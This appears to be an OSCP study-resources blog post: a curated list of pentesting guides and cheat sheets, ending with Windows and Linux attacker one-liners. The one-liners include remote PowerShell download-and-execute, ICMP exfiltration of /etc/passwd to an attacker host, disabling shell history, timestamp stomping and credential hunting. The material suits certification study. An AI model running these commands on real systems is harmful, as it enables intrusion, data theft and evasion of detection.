During my journey to getting the OSCP, I always come across many articles, Git repo, videos, and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great, I wanted to also build a curated list of the resources that I've collected overtime, all in one area for everyone to access.
This list will continue to grow over time as I come across new resources. If you know more resources or want me to add yours, please let me know and I'll add it in.
PS. A VERY big thank you to all the authors of these resources, for taking the time and energy putting this invaluable information together.
OSCP Certification Exam Guide
- Offensive Security
31 Days of OSCP Experience
- ParanoidNinja
Detailed Guide on OSCP Prep – From Newbie to OSCP
- Ramkisan Mohan
Offensive Security Certified Professional – Lab and Exam Review
- theslickgeek
Passing The OSCP
- Pink_Panther
OSCP Experience and the first torture!
- Nitesh Shilpkar
OSCP-like Vulnhub VMs
- abatchy
OSCP Training VM’s hosted on Vulnhub.com
- Andrew Hilton
Pinky's Palace CTFs
- Pink_Panther
Hack The Box OSCP-like VMs
- Tony
Search Ippsec's Videos for Specific Topics
- ippsec
Hack The Box, Over The Wire, Other CTFs
- derekrook
Metasploit Unleashed
- Offensive Security
15 Ways to Download a File
- NetSPI
Explain Shell - Great at explaining Linux Commands in Detail
- Idan Kamara
OWASP Testing Guide v4 Table of Contents
- owasp
Penetration Testing Tools Cheat Sheet
- Arr0way
Reverse Shell Cheat Sheet
- Arr0way
Linux Commands Cheat Sheet
- Arr0way
Reverse Shell Cheat Sheet
- Pentest Monkey
Black Room Sec - CTFs, Guides, Tools
- blackroomsec
Dostoevskylabs's PenTest Notes
- Dostoevskylabs
Pentest Compilation
- adon90
SecLists
- danielmiessler
OSCP-Prep
- burntmybagel
OSCP-Prep
- rhodejo
OSCP Scripts
- garyhooks
OSCP Scripts & Documents
- ihack4falafel
OSCP Recon Script
- xapax
Cheatsheet-God
- OlivierLaflamme
OSCP-Repo
- rewardone
Cheatsheets
- slyth11907
OSCP tricks
- WarLord
Go-For-OSCP
- WarLord
How to prepare for the OSCP ? A STUDY PLAN
- Magda CHELLY, CISSP, Ph.D
OSCP useful Links
- backdoorshell
Total OSCP Guide
- sushant747
OSCP Course & Exam Preparation
- 411Hall
OSCP Journey: Python Code Challenges
- Elias Ibrahim
SMB Enumeration Checklist
- 0xdf
Tunneling and Port Forwarding
- HackTricks
Post-Exploitation Windows File Transfers with SMB
- 0xdf
Multiple Ways to Exploit Tomcat Manager
- Raj Chande
PHP Web Shell
- WhiteWinterWolf
Msfvenom Cheat Sheet
- LucianNitescu
Linux Shells
- HackTricks
Windows Shells
- HackTricks
Dumping Clear-Text Credentials
- Pentestlab
OSCP Exam Report Template in Markdown
- noraj
OSCP Omnibus
- alexiasa
Brute Force - CheatSheet
- HackTricks
Checklist - Linux Privilege Escalation
- HackTricks
Checklist - Local Windows Privilege Escalation
- HackTricks
Preliminary SQL Injection Part 1
- Jatin Yadav
Preliminary SQL Injection Part 2
- Jatin Yadav
Informix SQL Injection Cheat Sheet
- pentestmonkey
MSSQL Injection Cheat Sheet
- pentestmonkey
Oracle SQL Injection Cheat Sheet
- pentestmonkey
MySQL SQL Injection Cheat Sheet
- pentestmonkey
Postgres SQL Injection Cheat Sheet
- pentestmonkey
DB2 SQL Injection Cheat Sheet
- pentestmonkey
Ingres SQL Injection Cheat Sheet
- pentestmonkey
SQL Injection Reference Library & Techniques
- SQLINjection
OSCP - Linux Priviledge Escalation
- WarLord
Basic Linux Privilege Escalation
- g0tmi1k
Linux Priv escalation
- carlospolop
Linux Privilege Escalation
- HackTricks
OSCP - Windows Priviledge Escalation
- WarLord
Awesome-Windows-Exploitation
- enddo
Windows Priv escalation
- kyawthiha7
Windows Privilege Escalation Fundamentals
- FuzzySec (b33f)
Windows Priv escalation
- carlospolop
Windows Local Privilege Escalation
- HackTricks
PHP Local and Remote File Inclusion (LFI, RFI) Attacks
- WarLord
Windows & Linux Exploit Development
- FuzzySec (b33f)
Exploit DB
- Offensive Security
Exploit Development - Starting from Part 1
- Corelan Team
Over The Wire - Wargames
- OverTheWire
Unix Privilege Escalation Exploits
- Kabot
Windows Kernel Exploits
- SecWiki
Linux Kernel Exploits
- lucyoa
Windows Exploit Development – Part 1: The Basics
Windows Exploit Development – Part 2: Intro-Stack-Overflow
Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules
Windows Exploit Development – Part 4: Locating-Shellcode-Jumps
Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting
Windows Exploit Development – Part 6: Seh-Exploits
Windows Exploit Development – Part 7: Unicode-Buffer-Overflows
Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]
Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]
Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]
Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]
Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]
Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]
~ Windows One-Liners ~ kindredsec
Obtain Permission String from All Services
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
Forward traffic to an internal host
netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip
Download and execute a remote PowerShell script (all in-memory)
iex (New-Object Net.Webclient).DownloadString('*remote_file*')
Check the permissions of all binaries associated with services
$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>null | Select-String -NotMatch "Successfully processed" }
Enable RDP (may also need firewall rule)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
~ Linux One-Liners ~ kindredsec
Stomp a timestamp to match other install-time files
touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g') malicious_file.sh
Prevent ran bash commands from being written to a history file
export HISTFILE=/dev/null
Exfiltrate users over ICMP
while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd
Locate mySQL credentials within web files
egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null
List all the SUID Binaries on a System
find / -perm -4000 2>/dev/null
Creates iptables rules to transparently route traffic destined to a specific port to an internal host
iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* & iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*
List all running processes being ran by users other than your current one
ps -elf | grep -v $(whoami)
List all system cronjobs
for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done